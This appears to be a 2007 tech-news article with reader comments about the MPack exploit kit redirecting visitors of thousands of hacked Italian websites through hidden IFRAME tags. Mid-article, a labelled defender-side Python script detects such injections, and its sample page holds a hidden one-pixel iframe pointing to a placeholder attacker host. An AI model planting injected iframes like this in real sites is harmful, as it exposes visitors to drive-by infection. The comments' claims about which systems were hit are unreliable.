Russian hackers hijack Italian sites to serve exploits
Summary: The Russian crime ring behind the infamous WebAttacker/MPack exploit toolkit hacked into thousands of Italian Web sites over the weekend and used a one-line snippet of code to redirect surfers to a server rigged with drive-by exploits.
The ongoing attacks, which are reminiscent of the Dolphin Stadium site breach in February, use a malicious IFRAME tag embedded in each hacked site to handle the redirection to the malware-laden server.
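As an added, defender-side example (not code from the article or from Trend Micro or Symantec), the following Python script flags IFRAME tags in a saved page that match the injection pattern described above: a frame that points at an off-site host, is hidden with CSS, or is sized 1x1 or smaller. The sample page and the hostnames in it are constructed placeholders.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample page (placeholder domains): a legitimate same-site
# booking frame, plus an injected one-line hidden frame pointing off-site.
SAMPLE_HTML = """<html><body><h1>Hotel Bella Vista</h1>
<iframe src="/booking/calendar.html" width="600" height="400"></iframe>
<iframe src="http://attacker.invalid/in.cgi?3" width=1 height=1 style="visibility:hidden"></iframe>
</body></html>"""

HIDDEN_STYLES = ("display:none", "visibility:hidden")


class IframeCollector(HTMLParser):
    """Collect the attributes of every <iframe> start tag in the page."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "iframe":
            self.iframes.append({k.lower(): (v or "") for k, v in attrs})


def _tiny(value):
    """True for a width/height of 0 or 1 px, the usual size of a hidden frame."""
    digits = value.strip().rstrip("px").strip()
    return digits.isdigit() and int(digits) <= 1


def suspicious_iframes(html, site_host):
    """Return iframes that point off-site, are CSS-hidden, or are 1x1 or smaller."""
    parser = IframeCollector()
    parser.feed(html)
    hits = []
    for attrs in parser.iframes:
        src = attrs.get("src", "")
        host = urlparse(src).hostname          # None for relative (same-site) URLs
        style = attrs.get("style", "").replace(" ", "").lower()
        reasons = []
        if host and host != site_host:
            reasons.append(f"off-site host {host}")
        if _tiny(attrs.get("width", "")) and _tiny(attrs.get("height", "")):
            reasons.append("1x1 or smaller")
        if any(s in style for s in HIDDEN_STYLES):
            reasons.append("hidden via CSS")
        if reasons:
            hits.append({"src": src, "reasons": reasons})
    return hits
```

Running `suspicious_iframes(SAMPLE_HTML, "www.hotel.example")` reports only the injected frame, with all three reasons; a hit on a page you did not author is a signal to compare the file against a known-good copy and check server access logs.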
Around midday today, the server hosting the exploits was live and anti-virus researchers tracking the attacks have found more than 8,000 hijacked Italian Web sites.
The affected sites span a wide range of Internet interests: cars and racing (likely chosen to take advantage of the Formula One weekend), hotels, sports, music, lottery and pornography sites were all victims. Even web sites connected to Jon Bon Jovi and Mother Teresa weren't spared, according to virus researchers at Trend Micro.
Here's a diagram of the attack scenario from Trend Micro's Carolyn Guevarra:
The MPack exploit kit used in these attacks contains a stats counter that spells out in detail the types of exploits used, the number of compromised computers and the types of browsers used by the victims (see screenshot above). In this case, it is clear that some newer exploit modules have been added to take aim at flaws in Firefox, Opera and even Apple's QuickTime media player.
Symantec's Elia Florio provides a glimpse at the statistics:
The list of compromised sites is huge and from Mpack statistics this attack is working efficiently (the statistic page reports 65K unique visitors with almost 7K exploited browsers).
It is important to note that the exploits are targeting vulnerabilities that have already been patched so the best defense is to ensure that your machine is fully patched (OS and applications running on top).
Secunia's free software inspector is a nice place to start scanning your machine to look for weak spots. This tool will detect insecure versions of installed applications, verify that all Microsoft patches are applied and assist you in updating your system and applications.
Talkback
No mention of OS involved......
It would have been more telling if the OS involved was listed though.
That you want or need to be told that...
I'll leave it up to you to figure out what "a lot" means.
Good luck.
Looks like all OS have been targeted.
Statistically, IE would be most targeted and exploited since more lusers use it.
not my understanding...windows only....
of course what the compromised server were running is an entirely different story...most likely apache and linux...but perhaps these were also win/iis. anyone know?
My understanding is that Windows is being exploited.
Your understanding is nil.
Is that your best take?
"end of summer" threat?
"It is important to note that the exploits are targeting vulnerabilities that have already been patched."
The news here really is the server hacks.
OSX has been owned
wow, your facts are soooo......made up!
um...the flaw was patched before any wild exploit, so any mac with an internet connection would have been updated automatically and not affected. where did you find your numbers? link?
my macs, just like my pc's and linux boxes, do have anti-virus, outbound application filtering, firewalls, etc. no matter the os, i don't run with scissors and always wear protection. Better safe than sorry, plus coming from a highly Redmond-centric background I'm used to having to crank down the security to visit the more interesting places on the net.
the mpack quicktime exploit is for win...sorry.
Where are your facts, Zealot?
What would *really* help...
Some of us would like to program our firewalls and HOSTS files to keep from being redirected to the sh[patch]trap.
Third octet
39
Be careful out there.
_ryan
239
_ryan
important story, but sensationalism ruins it
however, the article's good info is [b][i]utterly ruined[/i][/b] by ryan naraine's sensationalist headline and chicken little crying forth, [b]OHMIGAWD! IT'S ALL THE RUSSIAN MOB!!![/b]. puh-leez.
the truth, and naraine should well know this and report it as such, the mpack exploit tool kit may have originated with russian hackers and/or mob ties, but the truth is this tool kit can be sold to [b][i]anyone[/i][/b] in the world who could have hacked these italian tourism web sites.
the truth is, and naraine knows this also, the fbi and foreign police agencies like interpol do [b][i]not[/i][/b] know yet who specifically hacked these thousands of italian tourism web sites, only that they probably purchased the mpack tool kit from the russians to do it.
the reuters article on this is far more sober and even-handed, and gives users the info they really need to avoid being infected:
http://www.reuters.com/article/internetNews/idUSN1838812020070618
and yes, for those wondering what OS, it is windows, and an older exploit in i.e. that is the vulnerability. updating all your windows security and i.e., as well as all your anti-virus defs. and tools is highly recommended. also, avoid booking that italian dream vacation for a little bit, at least until all those sites have been taken down, cleaned and protected. ;o)
that, or use firefox or apple's safari for windows for your web browsing. or just use a mac or linux in general. ;o)))
[b][i]this[/i][/b] is the kind of non-sensationalist, but basic nuts and bolts good information based on the facts that users really need to read. not the fact that naraine has some sort of hard-on for blaming things on the russian mob when the truth is the fbi and other foreign police agencies still don't know who really pulled off this "italian job." whomever is naraine's editor should really call him to task for trying to garner more web hits through needless sensationalism when he [b][i]knows[/i][/b] those are not the facts as of yet.
Hang on a minute.
Erm...
I can't believe how offended No_Axe & NonZealot have become over this.
"In a world without walls & fences, who needs windows & gates."
Huh?
Plonk.